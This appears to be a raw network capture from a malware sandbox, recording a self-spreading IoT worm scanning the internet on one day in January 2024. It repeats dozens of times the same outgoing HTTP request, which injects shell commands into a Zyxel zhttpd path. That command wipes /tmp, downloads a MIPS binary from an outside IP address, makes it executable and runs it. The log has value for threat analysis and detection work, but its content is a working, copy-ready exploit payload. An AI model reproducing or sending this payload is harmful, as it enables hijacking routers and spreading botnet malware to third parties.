                                                Jan 28, 2024 10:16:43.082165956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8917192.168.2.23512968.29.248.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082194090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8918192.168.2.2354504117.91.160.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082199097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8919192.168.2.2333624193.241.249.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082232952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8920192.168.2.2358288208.133.8.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082284927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8921192.168.2.235481840.241.215.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082300901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8922192.168.2.2335074193.121.197.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082329988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8923192.168.2.235172434.217.241.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082350969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8924192.168.2.2353370209.45.248.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082350969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8925192.168.2.2358610145.193.211.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082386971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8926192.168.2.2337296151.234.214.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082408905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8927192.168.2.2343218133.192.101.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082443953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8928192.168.2.23520202.5.19.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082468033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8929192.168.2.235972647.75.6.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082494020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8930192.168.2.234813270.254.205.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082536936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8931192.168.2.2342364146.127.124.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082562923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8932192.168.2.23371885.140.37.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082571030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8933192.168.2.23464125.216.64.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082595110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8934192.168.2.234871876.169.83.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082647085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8935192.168.2.2350026128.228.114.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082670927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8936192.168.2.2343604199.144.132.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082709074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8937192.168.2.234796476.111.83.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082742929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8938192.168.2.2343442157.19.130.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082742929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8939192.168.2.2356966114.92.114.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082756996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8940192.168.2.2340966164.173.242.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082808971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8941192.168.2.233881062.82.46.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082832098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8942192.168.2.2355908113.235.233.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082861900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8943192.168.2.2336148181.75.97.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082886934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8944192.168.2.235012438.167.41.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082901955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8945192.168.2.234919019.242.167.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082933903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8946192.168.2.235277279.237.92.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082961082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8947192.168.2.234767438.3.8.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.082989931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8948192.168.2.2341554158.206.173.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083029985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8949192.168.2.2359634146.145.128.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083071947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8950192.168.2.234654066.157.122.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083086014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8951192.168.2.233873286.59.37.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083116055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8952192.168.2.2344334176.237.230.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083156109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8953192.168.2.233795070.156.182.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083189011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8954192.168.2.235843686.237.175.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083218098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8955192.168.2.233747617.35.215.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083239079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8956192.168.2.2352848209.187.2.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083250999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8957192.168.2.2360534126.244.31.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083303928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8958192.168.2.234006647.185.169.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083332062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8959192.168.2.2345222175.45.223.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083347082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8960192.168.2.2356990107.157.163.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083369970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8961192.168.2.2358644124.75.77.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083398104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8962192.168.2.233791840.35.239.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083448887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8963192.168.2.2335244202.106.248.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083471060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8964192.168.2.2334536128.30.33.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083501101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8965192.168.2.2358108115.120.2.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083527088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8966192.168.2.2357742197.171.173.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083561897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8967192.168.2.2360568145.38.86.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083601952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8968192.168.2.2345168120.96.64.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083601952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8969192.168.2.234035290.138.239.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083650112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8970192.168.2.2333618188.176.155.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083667040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8971192.168.2.234271270.136.234.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083700895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8972192.168.2.2345266136.93.188.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083725929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8973192.168.2.2355632131.113.185.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083745956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8974192.168.2.2349802194.140.217.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083760023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8975192.168.2.2357838223.107.147.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083760023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8976192.168.2.235364057.187.46.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083764076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8977192.168.2.2338592143.37.23.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.083831072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8978192.168.2.2333438145.119.245.167443
                                                TimestampBytes transferredDirectionData
